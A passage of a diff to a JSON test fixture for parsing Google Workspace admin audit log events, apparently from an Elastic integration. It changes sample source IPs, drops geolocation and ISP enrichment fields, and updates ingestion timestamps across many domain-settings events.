"98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1675,35 +1315,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091214600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHROME_LICENSES_REDEEMED\",\"parameters\":[{\"name\":\"APP_LICENSES_ORDER_NUMBER\",\"value\":\"abcd123\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"},{\"name\":\"CHROME_NUM_LICENSES_PURCHASED\",\"intValue\":1}]}}", + "ingested": "2021-12-09T13:38:31.915855800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHROME_LICENSES_REDEEMED\",\"parameters\":[{\"name\":\"APP_LICENSES_ORDER_NUMBER\",\"value\":\"abcd123\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"app name\"},{\"name\":\"CHROME_NUM_LICENSES_PURCHASED\",\"intValue\":1}]}}", "provider": "admin", "action": "CHROME_LICENSES_REDEEMED", "id": "1", @@ -1733,7 +1355,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1757,35 +1379,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091217300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_AUTO_ADD_NEW_SERVICE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", + "ingested": "2021-12-09T13:38:31.915861500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_AUTO_ADD_NEW_SERVICE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", "provider": "admin", "action": "TOGGLE_AUTO_ADD_NEW_SERVICE", "id": "1", @@ -1815,7 +1419,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1839,35 +1443,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091220200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PRIMARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", + "ingested": "2021-12-09T13:38:31.915867400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_PRIMARY_DOMAIN\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", "provider": "admin", "action": "CHANGE_PRIMARY_DOMAIN", "id": "1", @@ -1897,7 +1483,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1921,35 +1507,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091223100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_WHITELIST_SETTING\",\"parameters\":[{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.915873300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_WHITELIST_SETTING\",\"parameters\":[{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_WHITELIST_SETTING", "id": "1", @@ -1980,7 +1548,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2004,35 +1572,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091225800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"COMMUNICATION_PREFERENCES_SETTING_CHANGE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.915879100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"COMMUNICATION_PREFERENCES_SETTING_CHANGE\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"SETTING_NAME\",\"value\":\"setting\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "COMMUNICATION_PREFERENCES_SETTING_CHANGE", "id": "1", @@ -2063,7 +1613,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2087,35 +1637,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091228600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_CONFLICT_ACCOUNT_ACTION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.915884800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_CONFLICT_ACCOUNT_ACTION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_CONFLICT_ACCOUNT_ACTION", "id": "1", @@ -2145,7 +1677,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2169,35 +1701,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091268Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_FEEDBACK_SOLICITATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:31.915890600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"ENABLE_FEEDBACK_SOLICITATION\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "ENABLE_FEEDBACK_SOLICITATION", "id": "1", @@ -2228,7 +1742,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2252,35 +1766,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091274100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_CONTACT_SHARING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", + "ingested": "2021-12-09T13:38:31.915896400Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_CONTACT_SHARING\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", "provider": "admin", "action": "TOGGLE_CONTACT_SHARING", "id": "1", @@ -2311,7 +1807,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2335,35 +1831,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091277600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_PLAY_FOR_WORK_TOKEN\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}", + "ingested": "2021-12-09T13:38:31.915900600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CREATE_PLAY_FOR_WORK_TOKEN\",\"parameters\":[{\"name\":\"PLAY_FOR_WORK_TOKEN_ID\",\"value\":\"token\"}]}}", "provider": "admin", "action": "CREATE_PLAY_FOR_WORK_TOKEN", "id": "1", @@ -2393,7 +1871,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2417,35 +1895,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091280700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_USE_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", + "ingested": "2021-12-09T13:38:31.915905300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"TOGGLE_USE_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"false\"}]}}", "provider": "admin", "action": "TOGGLE_USE_CUSTOM_LOGO", "id": "1", @@ -2476,7 +1936,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2500,35 +1960,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091283700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", + "ingested": "2021-12-09T13:38:31.915910500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_CUSTOM_LOGO\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"}]}}", "provider": "admin", "action": "CHANGE_CUSTOM_LOGO", "id": "1", @@ -2558,7 +2000,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2580,35 +2022,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091286400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_LOCALIZATION_FOR_RUSSIA\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:31.915915800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_LOCALIZATION_FOR_RUSSIA\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CHANGE_DATA_LOCALIZATION_FOR_RUSSIA", "id": "1", @@ -2638,7 +2062,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2660,35 +2084,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091289100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_LOCALIZATION_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:31.915920600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_LOCALIZATION_SETTING\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CHANGE_DATA_LOCALIZATION_SETTING", "id": "1", @@ -2719,7 +2125,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -2741,35 +2147,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:20.091291700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_PROTECTION_OFFICER_CONTACT_INFO\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"INFO_TYPE\",\"value\":\"ADDRESS\"}]}}", + "ingested": "2021-12-09T13:38:31.915924200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOMAIN_SETTINGS\",\"name\":\"CHANGE_DATA_PROTECTION_OFFICER_CONTACT_INFO\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"INFO_TYPE\",\"value\":\"ADDRESS\"}]}}", "provider": "admin", "action": "CHANGE_DATA_PROTECTION_OFFICER_CONTACT_INFO", "id": "1", @@ -2799,7 +2187,7 @@ "foo" ], "ip": 